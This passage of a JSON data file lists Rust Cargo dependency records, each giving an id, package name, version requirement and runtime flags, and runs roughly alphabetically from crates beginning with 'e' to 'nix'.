o","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970002857,"package_name":"enum-as-inner","ecosystem":"cargo","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970002858,"package_name":"enum-display-derive","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970002859,"package_name":"enum-primitive-derive","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002860,"package_name":"env_filter","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970002861,"package_name":"env_home","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002862,"package_name":"env_logger","ecosystem":"cargo","requirements":"0.11.6","direct":false,"kind":"runtime","optional":false},{"id":25970002863,"package_name":"equivalent","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970002864,"package_name":"errno","ecosystem":"cargo","requirements":"0.3.10","direct":false,"kind":"runtime","optional":false},{"id":25970002865,"package_name":"error-code","ecosystem":"cargo","requirements":"3.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002866,"package_name":"error_reporter","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002867,"package_name":"esbuild_client","ecosystem":"cargo","requirements":"0.7.2","direct":false,"kind":"runtime","optional":false},{"id":25970002868,"package_name":"fallible-iterator","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002869,"package_name":"fallible-streaming-iterator","ecosystem":"cargo","requirements":"0.1.9","direct":false,"kind":"runtime","optional":false},{"id":25970002870,"package_name":"fast-socks5","ecosystem":"cargo","requirements":"0.9.6","direct":false,"kind":"runtime","optional":false},{"id":25970002877,"package_name":"fastbloom","ecosystem":"cargo","requirements":"0.17.0","direct":false,"kind":"runtime","optional":false},{"id":25970002878,"package_name":"faster-hex","ecosystem":"cargo","requirements":"0.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970002879,"package_name":"fastrand","ecosystem":"cargo","requirements":"2.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002880,"package_name":"fastwebsockets","ecosystem":"cargo","requirements":"0.8.1","direct":false,"kind":"runtime","optional":false},{"id":25970002881,"package_name":"fastwebsockets","ecosystem":"cargo","requirements":"0.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970002882,"package_name":"fd-lock","ecosystem":"cargo","requirements":"4.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970002883,"package_name":"fdeflate","ecosystem":"cargo","requirements":"0.3.4","direct":false,"kind":"runtime","optional":false},{"id":25970002884,"package_name":"ff","ecosystem":"cargo","requirements":"0.13.0","direct":false,"kind":"runtime","optional":false},{"id":25970002885,"package_name":"fiat-crypto","ecosystem":"cargo","requirements":"0.2.7","direct":false,"kind":"runtime","optional":false},{"id":25970002886,"package_name":"file_test_runner","ecosystem":"cargo","requirements":"0.12.1","direct":false,"kind":"runtime","optional":false},{"id":25970002887,"package_name":"filetime","ecosystem":"cargo","requirements":"0.2.23","direct":false,"kind":"runtime","optional":false},{"id":25970002888,"package_name":"find-msvc-tools","ecosystem":"cargo","requirements":"0.1.9","direct":false,"kind":"runtime","optional":false},{"id":25970002889,"package_name":"fips203","ecosystem":"cargo","requirements":"0.4.3","direct":false,"kind":"runtime","optional":false},{"id":25970002890,"package_name":"fips205","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002891,"package_name":"flate2","ecosystem":"cargo","requirements":"1.0.35","direct":false,"kind":"runtime","optional":false},{"id":25970002892,"package_name":"fluent-uri","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002893,"package_name":"fnv","ecosystem":"cargo","requirements":"1.0.7","direct":false,"kind":"runtime","optional":false},{"id":25970002894,"package_name":"foldhash","ecosystem":"cargo","requirements":"0.1.4","direct":false,"kind":"runtime","optional":false},{"id":25970002895,"package_name":"foldhash","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002896,"package_name":"foreign-types","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970002897,"package_name":"foreign-types","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002898,"package_name":"foreign-types-macros","ecosystem":"cargo","requirements":"0.2.3","direct":false,"kind":"runtime","optional":false},{"id":25970002899,"package_name":"foreign-types-shared","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003000,"package_name":"icu_locale_data","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002900,"package_name":"foreign-types-shared","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970002901,"package_name":"form_urlencoded","ecosystem":"cargo","requirements":"1.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970002902,"package_name":"fqdn","ecosystem":"cargo","requirements":"0.5.2","direct":false,"kind":"runtime","optional":false},{"id":25970002903,"package_name":"from_variant","ecosystem":"cargo","requirements":"3.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002904,"package_name":"fs_extra","ecosystem":"cargo","requirements":"1.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970002905,"package_name":"fsevent-sys","ecosystem":"cargo","requirements":"4.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002906,"package_name":"fslock","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002907,"package_name":"funty","ecosystem":"cargo","requirements":"2.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002908,"package_name":"futures","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002909,"package_name":"futures-channel","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002910,"package_name":"futures-core","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002911,"package_name":"futures-executor","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002912,"package_name":"futures-io","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002913,"package_name":"futures-lite","ecosystem":"cargo","requirements":"2.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970002914,"package_name":"futures-macro","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002915,"package_name":"futures-sink","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002916,"package_name":"futures-task","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002917,"package_name":"futures-timer","ecosystem":"cargo","requirements":"3.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970002918,"package_name":"futures-util","ecosystem":"cargo","requirements":"0.3.31","direct":false,"kind":"runtime","optional":false},{"id":25970002919,"package_name":"generator","ecosystem":"cargo","requirements":"0.8.4","direct":false,"kind":"runtime","optional":false},{"id":25970002920,"package_name":"generic-array","ecosystem":"cargo","requirements":"0.14.7","direct":false,"kind":"runtime","optional":false},{"id":25970002921,"package_name":"getrandom","ecosystem":"cargo","requirements":"0.2.14","direct":false,"kind":"runtime","optional":false},{"id":25970002922,"package_name":"getrandom","ecosystem":"cargo","requirements":"0.3.3","direct":false,"kind":"runtime","optional":false},{"id":25970002923,"package_name":"getrandom","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002924,"package_name":"ghash","ecosystem":"cargo","requirements":"0.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970002925,"package_name":"gif","ecosystem":"cargo","requirements":"0.13.1","direct":false,"kind":"runtime","optional":false},{"id":25970002926,"package_name":"gimli","ecosystem":"cargo","requirements":"0.31.1","direct":false,"kind":"runtime","optional":false},{"id":25970002927,"package_name":"gl_generator","ecosystem":"cargo","requirements":"0.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970002928,"package_name":"glob","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970002929,"package_name":"globset","ecosystem":"cargo","requirements":"0.4.14","direct":false,"kind":"runtime","optional":false},{"id":25970002930,"package_name":"glow","ecosystem":"cargo","requirements":"0.17.0","direct":false,"kind":"runtime","optional":false},{"id":25970002931,"package_name":"glutin_wgl_sys","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970002932,"package_name":"gpu-allocator","ecosystem":"cargo","requirements":"0.28.0","direct":false,"kind":"runtime","optional":false},{"id":25970002933,"package_name":"gpu-descriptor","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970002934,"package_name":"gpu-descriptor-types","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002935,"package_name":"group","ecosystem":"cargo","requirements":"0.13.0","direct":false,"kind":"runtime","optional":false},{"id":25970002936,"package_name":"gzip-header","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002949,"package_name":"h2","ecosystem":"cargo","requirements":"0.4.7","direct":false,"kind":"runtime","optional":false},{"id":25970002950,"package_name":"half","ecosystem":"cargo","requirements":"2.7.1","direct":false,"kind":"runtime","optional":false},{"id":25970002951,"package_name":"handlebars","ecosystem":"cargo","requirements":"6.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970002952,"package_name":"hash2curve","ecosystem":"cargo","requirements":"0.14.0-rc.10","direct":false,"kind":"runtime","optional":false},{"id":25970002953,"package_name":"hash32","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970002954,"package_name":"hashbrown","ecosystem":"cargo","requirements":"0.14.5","direct":false,"kind":"runtime","optional":false},{"id":25970002955,"package_name":"hashbrown","ecosystem":"cargo","requirements":"0.15.5","direct":false,"kind":"runtime","optional":false},{"id":25970002956,"package_name":"hashbrown","ecosystem":"cargo","requirements":"0.16.1","direct":false,"kind":"runtime","optional":false},{"id":25970002957,"package_name":"hashbrown","ecosystem":"cargo","requirements":"0.17.1","direct":false,"kind":"runtime","optional":false},{"id":25970002958,"package_name":"hashlink","ecosystem":"cargo","requirements":"0.8.4","direct":false,"kind":"runtime","optional":false},{"id":25970002959,"package_name":"hashlink","ecosystem":"cargo","requirements":"0.12.0","direct":false,"kind":"runtime","optional":false},{"id":25970002960,"package_name":"hdrhistogram","ecosystem":"cargo","requirements":"7.5.4","direct":false,"kind":"runtime","optional":false},{"id":25970002961,"package_name":"heapless","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970002962,"package_name":"heck","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970002963,"package_name":"heck","ecosystem":"cargo","requirements":"0.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002964,"package_name":"hermit-abi","ecosystem":"cargo","requirements":"0.3.9","direct":false,"kind":"runtime","optional":false},{"id":25970002965,"package_name":"hermit-abi","ecosystem":"cargo","requirements":"0.5.2","direct":false,"kind":"runtime","optional":false},{"id":25970002966,"package_name":"hex","ecosystem":"cargo","requirements":"0.4.3","direct":false,"kind":"runtime","optional":false},{"id":25970002967,"package_name":"hexf-parse","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002968,"package_name":"hickory-proto","ecosystem":"cargo","requirements":"0.25.2","direct":false,"kind":"runtime","optional":false},{"id":25970002969,"package_name":"hickory-resolver","ecosystem":"cargo","requirements":"0.25.2","direct":false,"kind":"runtime","optional":false},{"id":25970002970,"package_name":"hickory-server","ecosystem":"cargo","requirements":"0.25.2","direct":false,"kind":"runtime","optional":false},{"id":25970002975,"package_name":"hipstr","ecosystem":"cargo","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970002976,"package_name":"hkdf","ecosystem":"cargo","requirements":"0.12.4","direct":false,"kind":"runtime","optional":false},{"id":25970002977,"package_name":"hmac","ecosystem":"cargo","requirements":"0.12.1","direct":false,"kind":"runtime","optional":false},{"id":25970002978,"package_name":"home","ecosystem":"cargo","requirements":"0.5.9","direct":false,"kind":"runtime","optional":false},{"id":25970002979,"package_name":"hostname","ecosystem":"cargo","requirements":"0.3.1","direct":false,"kind":"runtime","optional":false},{"id":25970002980,"package_name":"hstr","ecosystem":"cargo","requirements":"3.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970002981,"package_name":"html-escape","ecosystem":"cargo","requirements":"0.2.13","direct":false,"kind":"runtime","optional":false},{"id":25970002982,"package_name":"http","ecosystem":"cargo","requirements":"1.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970002983,"package_name":"http-body","ecosystem":"cargo","requirements":"1.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970002984,"package_name":"http-body-util","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970002985,"package_name":"httparse","ecosystem":"cargo","requirements":"1.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970002986,"package_name":"httpdate","ecosystem":"cargo","requirements":"1.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970002987,"package_name":"hybrid-array","ecosystem":"cargo","requirements":"0.4.7","direct":false,"kind":"runtime","optional":false},{"id":25970002988,"package_name":"hyper","ecosystem":"cargo","requirements":"1.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970002989,"package_name":"hyper-rustls","ecosystem":"cargo","requirements":"0.27.2","direct":false,"kind":"runtime","optional":false},{"id":25970002990,"package_name":"hyper-timeout","ecosystem":"cargo","requirements":"0.5.2","direct":false,"kind":"runtime","optional":false},{"id":25970002991,"package_name":"hyper-util","ecosystem":"cargo","requirements":"0.1.17","direct":false,"kind":"runtime","optional":false},{"id":25970002992,"package_name":"icu_calendar","ecosystem":"cargo","requirements":"2.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002993,"package_name":"icu_calendar_data","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002994,"package_name":"icu_collator","ecosystem":"cargo","requirements":"2.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970002995,"package_name":"icu_collator_data","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002996,"package_name":"icu_collections","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970002997,"package_name":"icu_collections","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002998,"package_name":"icu_locale","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970002999,"package_name":"icu_locale_core","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003001,"package_name":"icu_locid","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003002,"package_name":"icu_locid_transform","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003003,"package_name":"icu_locid_transform_data","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003004,"package_name":"icu_normalizer","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003005,"package_name":"icu_normalizer","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003006,"package_name":"icu_normalizer_data","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003007,"package_name":"icu_normalizer_data","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003008,"package_name":"icu_properties","ecosystem":"cargo","requirements":"1.5.1","direct":false,"kind":"runtime","optional":false},{"id":25970003009,"package_name":"icu_properties","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003010,"package_name":"icu_properties_data","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003011,"package_name":"icu_properties_data","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003012,"package_name":"icu_provider","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003013,"package_name":"icu_provider","ecosystem":"cargo","requirements":"2.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003014,"package_name":"icu_provider_macros","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003015,"package_name":"id-arena","ecosystem":"cargo","requirements":"2.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003016,"package_name":"ident_case","ecosystem":"cargo","requirements":"1.0.1","direct":false,"kind":"runtime","optional":false},{"id":25970003017,"package_name":"idna","ecosystem":"cargo","requirements":"1.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003018,"package_name":"idna_adapter","ecosystem":"cargo","requirements":"1.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003019,"package_name":"if_chain","ecosystem":"cargo","requirements":"1.0.2","direct":false,"kind":"runtime","optional":false},{"id":25970003020,"package_name":"ignore","ecosystem":"cargo","requirements":"0.4.20","direct":false,"kind":"runtime","optional":false},{"id":25970003021,"package_name":"image","ecosystem":"cargo","requirements":"0.25.4","direct":false,"kind":"runtime","optional":false},{"id":25970003022,"package_name":"image-webp","ecosystem":"cargo","requirements":"0.2.4","direct":false,"kind":"runtime","optional":false},{"id":25970003023,"package_name":"imara-diff","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003024,"package_name":"import_map","ecosystem":"cargo","requirements":"0.25.0","direct":false,"kind":"runtime","optional":false},{"id":25970003046,"package_name":"indexmap","ecosystem":"cargo","requirements":"2.12.0","direct":false,"kind":"runtime","optional":false},{"id":25970003047,"package_name":"inotify","ecosystem":"cargo","requirements":"0.11.1","direct":false,"kind":"runtime","optional":false},{"id":25970003048,"package_name":"inotify-sys","ecosystem":"cargo","requirements":"0.1.5","direct":false,"kind":"runtime","optional":false},{"id":25970003049,"package_name":"inout","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970003050,"package_name":"insta","ecosystem":"cargo","requirements":"1.46.3","direct":false,"kind":"runtime","optional":false},{"id":25970003051,"package_name":"inventory","ecosystem":"cargo","requirements":"0.3.21","direct":false,"kind":"runtime","optional":false},{"id":25970003052,"package_name":"io-uring","ecosystem":"cargo","requirements":"0.7.8","direct":false,"kind":"runtime","optional":false},{"id":25970003053,"package_name":"ipconfig","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003054,"package_name":"ipnet","ecosystem":"cargo","requirements":"2.9.0","direct":false,"kind":"runtime","optional":false},{"id":25970003055,"package_name":"is-docker","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003056,"package_name":"is-macro","ecosystem":"cargo","requirements":"0.3.5","direct":false,"kind":"runtime","optional":false},{"id":25970003057,"package_name":"is-terminal","ecosystem":"cargo","requirements":"0.4.17","direct":false,"kind":"runtime","optional":false},{"id":25970003058,"package_name":"is-wsl","ecosystem":"cargo","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":25970003059,"package_name":"is_terminal_polyfill","ecosystem":"cargo","requirements":"1.70.1","direct":false,"kind":"runtime","optional":false},{"id":25970003060,"package_name":"itertools","ecosystem":"cargo","requirements":"0.10.5","direct":false,"kind":"runtime","optional":false},{"id":25970003061,"package_name":"itertools","ecosystem":"cargo","requirements":"0.14.0","direct":false,"kind":"runtime","optional":false},{"id":25970003062,"package_name":"itoa","ecosystem":"cargo","requirements":"1.0.15","direct":false,"kind":"runtime","optional":false},{"id":25970003063,"package_name":"ixdtf","ecosystem":"cargo","requirements":"0.6.4","direct":false,"kind":"runtime","optional":false},{"id":25970003064,"package_name":"jni-sys","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003065,"package_name":"jobserver","ecosystem":"cargo","requirements":"0.1.32","direct":false,"kind":"runtime","optional":false},{"id":25970003066,"package_name":"js-sys","ecosystem":"cargo","requirements":"0.3.99","direct":false,"kind":"runtime","optional":false},{"id":25970003067,"package_name":"jsonc-parser","ecosystem":"cargo","requirements":"0.32.1","direct":false,"kind":"runtime","optional":false},{"id":25970003075,"package_name":"junction","ecosystem":"cargo","requirements":"1.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003076,"package_name":"k256","ecosystem":"cargo","requirements":"0.13.3","direct":false,"kind":"runtime","optional":false},{"id":25970003077,"package_name":"keccak","ecosystem":"cargo","requirements":"0.1.6","direct":false,"kind":"runtime","optional":false},{"id":25970003078,"package_name":"keccak","ecosystem":"cargo","requirements":"0.2.0-rc.2","direct":false,"kind":"runtime","optional":false},{"id":25970003079,"package_name":"keyring","ecosystem":"cargo","requirements":"3.6.3","direct":false,"kind":"runtime","optional":false},{"id":25970003080,"package_name":"khronos-egl","ecosystem":"cargo","requirements":"6.0.0","direct":false,"kind":"runtime","optional":false},{"id":25970003081,"package_name":"khronos_api","ecosystem":"cargo","requirements":"3.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003082,"package_name":"kqueue","ecosystem":"cargo","requirements":"1.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003083,"package_name":"kqueue-sys","ecosystem":"cargo","requirements":"1.0.4","direct":false,"kind":"runtime","optional":false},{"id":25970003084,"package_name":"laufey","ecosystem":"cargo","requirements":"0.6.1","direct":false,"kind":"runtime","optional":false},{"id":25970003085,"package_name":"lax-core","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003086,"package_name":"lax-css","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003087,"package_name":"lax-markup","ecosystem":"cargo","requirements":"0.3.2","direct":false,"kind":"runtime","optional":false},{"id":25970003088,"package_name":"lax-sql","ecosystem":"cargo","requirements":"0.3.0","direct":false,"kind":"runtime","optional":false},{"id":25970003089,"package_name":"lazy-regex","ecosystem":"cargo","requirements":"3.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003090,"package_name":"lazy-regex-proc_macros","ecosystem":"cargo","requirements":"3.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003091,"package_name":"lazy_static","ecosystem":"cargo","requirements":"1.5.0","direct":false,"kind":"runtime","optional":false},{"id":25970003092,"package_name":"lcms2","ecosystem":"cargo","requirements":"6.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003093,"package_name":"lcms2-sys","ecosystem":"cargo","requirements":"4.0.5","direct":false,"kind":"runtime","optional":false},{"id":25970003094,"package_name":"leb128fmt","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003095,"package_name":"libbz2-rs-sys","ecosystem":"cargo","requirements":"0.2.5","direct":false,"kind":"runtime","optional":false},{"id":25970003096,"package_name":"libc","ecosystem":"cargo","requirements":"0.2.186","direct":false,"kind":"runtime","optional":false},{"id":25970003097,"package_name":"libdbus-sys","ecosystem":"cargo","requirements":"0.2.5","direct":false,"kind":"runtime","optional":false},{"id":25970003098,"package_name":"libdeflate-sys","ecosystem":"cargo","requirements":"1.25.2","direct":false,"kind":"runtime","optional":false},{"id":25970003099,"package_name":"libdeflater","ecosystem":"cargo","requirements":"1.25.2","direct":false,"kind":"runtime","optional":false},{"id":25970003100,"package_name":"libffi","ecosystem":"cargo","requirements":"5.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003101,"package_name":"libffi-sys","ecosystem":"cargo","requirements":"4.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003102,"package_name":"libloading","ecosystem":"cargo","requirements":"0.7.4","direct":false,"kind":"runtime","optional":false},{"id":25970003103,"package_name":"libloading","ecosystem":"cargo","requirements":"0.8.5","direct":false,"kind":"runtime","optional":false},{"id":25970003104,"package_name":"liblzma","ecosystem":"cargo","requirements":"0.4.6","direct":false,"kind":"runtime","optional":false},{"id":25970003105,"package_name":"liblzma-sys","ecosystem":"cargo","requirements":"0.4.6","direct":false,"kind":"runtime","optional":false},{"id":25970003106,"package_name":"libm","ecosystem":"cargo","requirements":"0.2.8","direct":false,"kind":"runtime","optional":false},{"id":25970003107,"package_name":"libnghttp2","ecosystem":"cargo","requirements":"1.68.0","direct":false,"kind":"runtime","optional":false},{"id":25970003110,"package_name":"libsqlite3-sys","ecosystem":"cargo","requirements":"0.38.1","direct":false,"kind":"runtime","optional":false},{"id":25970003111,"package_name":"libsui","ecosystem":"cargo","requirements":"0.16.4","direct":false,"kind":"runtime","optional":false},{"id":25970003112,"package_name":"libuv-sys-lite","ecosystem":"cargo","requirements":"1.48.3","direct":false,"kind":"runtime","optional":false},{"id":25970003113,"package_name":"libz-sys","ecosystem":"cargo","requirements":"1.1.20","direct":false,"kind":"runtime","optional":false},{"id":25970003114,"package_name":"linux-raw-sys","ecosystem":"cargo","requirements":"0.4.13","direct":false,"kind":"runtime","optional":false},{"id":25970003115,"package_name":"linux-raw-sys","ecosystem":"cargo","requirements":"0.12.1","direct":false,"kind":"runtime","optional":false},{"id":25970003116,"package_name":"litemap","ecosystem":"cargo","requirements":"0.7.3","direct":false,"kind":"runtime","optional":false},{"id":25970003117,"package_name":"litemap","ecosystem":"cargo","requirements":"0.8.0","direct":false,"kind":"runtime","optional":false},{"id":25970003118,"package_name":"litrs","ecosystem":"cargo","requirements":"0.4.1","direct":false,"kind":"runtime","optional":false},{"id":25970003119,"package_name":"lock_api","ecosystem":"cargo","requirements":"0.4.11","direct":false,"kind":"runtime","optional":false},{"id":25970003120,"package_name":"locked-tripwire","ecosystem":"cargo","requirements":"0.1.1","direct":false,"kind":"runtime","optional":false},{"id":25970003128,"package_name":"log","ecosystem":"cargo","requirements":"0.4.32","direct":false,"kind":"runtime","optional":false},{"id":25970003129,"package_name":"loom","ecosystem":"cargo","requirements":"0.7.2","direct":false,"kind":"runtime","optional":false},{"id":25970003130,"package_name":"lru-slab","ecosystem":"cargo","requirements":"0.1.2","direct":false,"kind":"runtime","optional":false},{"id":25970003131,"package_name":"ls-types","ecosystem":"cargo","requirements":"0.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003159,"package_name":"lzxd","ecosystem":"cargo","requirements":"0.2.6","direct":false,"kind":"runtime","optional":false},{"id":25970003160,"package_name":"macro_rules_attribute","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970003161,"package_name":"macro_rules_attribute-proc_macro","ecosystem":"cargo","requirements":"0.2.2","direct":false,"kind":"runtime","optional":false},{"id":25970003162,"package_name":"match_cfg","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003163,"package_name":"matchers","ecosystem":"cargo","requirements":"0.2.0","direct":false,"kind":"runtime","optional":false},{"id":25970003164,"package_name":"md-5","ecosystem":"cargo","requirements":"0.10.6","direct":false,"kind":"runtime","optional":false},{"id":25970003165,"package_name":"md4","ecosystem":"cargo","requirements":"0.10.2","direct":false,"kind":"runtime","optional":false},{"id":25970003166,"package_name":"memchr","ecosystem":"cargo","requirements":"2.8.1","direct":false,"kind":"runtime","optional":false},{"id":25970003167,"package_name":"memmap2","ecosystem":"cargo","requirements":"0.9.5","direct":false,"kind":"runtime","optional":false},{"id":25970003168,"package_name":"memoffset","ecosystem":"cargo","requirements":"0.9.1","direct":false,"kind":"runtime","optional":false},{"id":25970003169,"package_name":"mime","ecosystem":"cargo","requirements":"0.3.17","direct":false,"kind":"runtime","optional":false},{"id":25970003170,"package_name":"minimal-lexical","ecosystem":"cargo","requirements":"0.2.1","direct":false,"kind":"runtime","optional":false},{"id":25970003171,"package_name":"miniz_oxide","ecosystem":"cargo","requirements":"0.7.2","direct":false,"kind":"runtime","optional":false},{"id":25970003172,"package_name":"miniz_oxide","ecosystem":"cargo","requirements":"0.8.8","direct":false,"kind":"runtime","optional":false},{"id":25970003173,"package_name":"mintex","ecosystem":"cargo","requirements":"0.1.3","direct":false,"kind":"runtime","optional":false},{"id":25970003174,"package_name":"mio","ecosystem":"cargo","requirements":"1.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003175,"package_name":"moka","ecosystem":"cargo","requirements":"0.12.10","direct":false,"kind":"runtime","optional":false},{"id":25970003176,"package_name":"monch","ecosystem":"cargo","requirements":"0.6.0","direct":false,"kind":"runtime","optional":false},{"id":25970003177,"package_name":"msi","ecosystem":"cargo","requirements":"0.10.0","direct":false,"kind":"runtime","optional":false},{"id":25970003178,"package_name":"naga","ecosystem":"cargo","requirements":"29.0.3","direct":false,"kind":"runtime","optional":false},{"id":25970003179,"package_name":"ndk-sys","ecosystem":"cargo","requirements":"0.6.0+11769913","direct":false,"kind":"runtime","optional":false},{"id":25970003180,"package_name":"netif","ecosystem":"cargo","requirements":"0.1.6","direct":false,"kind":"runtime","optional":false},{"id":25970003181,"package_name":"new_debug_unreachable","ecosystem":"cargo","requirements":"1.0.6","direct":false,"kind":"runtime","optional":false},{"id":25970003182,"package_name":"nibble_vec","ecosystem":"cargo","requirements":"0.1.0","direct":false,"kind":"runtime","optional":false},{"id":25970003183,"package_name":"nix","ecosystem":"cargo","requirements":"0.29.0","direct":false,"kind":"runtime","optional":false},{"id":25970003184,"package_name":"nix","ecosystem":"cargo","requirements":"0.30.1","direct":false,"kind":"runtime","optional":false},{"id":259